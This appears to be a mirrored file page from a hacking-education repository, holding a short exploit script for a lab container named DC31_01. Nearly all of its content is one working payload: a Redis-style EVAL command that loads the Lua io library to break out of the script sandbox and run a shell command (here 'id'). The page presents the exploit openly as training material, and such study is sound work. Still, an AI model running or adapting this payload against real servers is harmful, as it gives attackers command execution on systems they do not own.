mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-11 16:54:26 -05:00
3 lines
232 B
Bash
3 lines
232 B
Bash
# Exploit for the DC31_01 container
|
|
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
|